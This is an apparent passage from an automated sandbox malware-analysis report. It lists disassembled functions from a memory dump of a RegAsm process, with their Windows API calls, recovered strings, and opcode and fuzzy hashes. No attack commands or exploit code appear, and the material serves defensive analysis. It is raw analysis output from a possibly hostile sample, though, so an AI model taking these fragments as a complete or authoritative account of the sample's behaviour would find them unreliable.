                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                      Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2163313125-0
                                                                                                                                                                                                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                                      Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$wcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3592753638-3916222277
                                                                                                                                                                                                                      • Opcode ID: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                                                                                                                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                                      Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                      • String ID: %s (%s)$YV@
                                                                                                                                                                                                                      • API String ID: 3979103747-598926743
                                                                                                                                                                                                                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                                      Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                      • API String ID: 2767993716-572158859
                                                                                                                                                                                                                      • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                                      Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                      • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                      • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                                      Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                      • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                      • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                      • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                                      Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                      • String ID: ($d
                                                                                                                                                                                                                      • API String ID: 1140211610-1915259565
                                                                                                                                                                                                                      • Opcode ID: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                                                                                                                                                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                                      Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3015003838-0
                                                                                                                                                                                                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                                      Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 59245283-0
                                                                                                                                                                                                                      • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                                      Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                                      Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                      • String ID: 3A
                                                                                                                                                                                                                      • API String ID: 3300951397-293699754
                                                                                                                                                                                                                      • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                                      Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                      • String ID: strings
                                                                                                                                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                      Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                      • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                      • API String ID: 776488737-1622828088
                                                                                                                                                                                                                      • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                                      Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                                                                                      • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                      • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                                      Function 004044A4 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
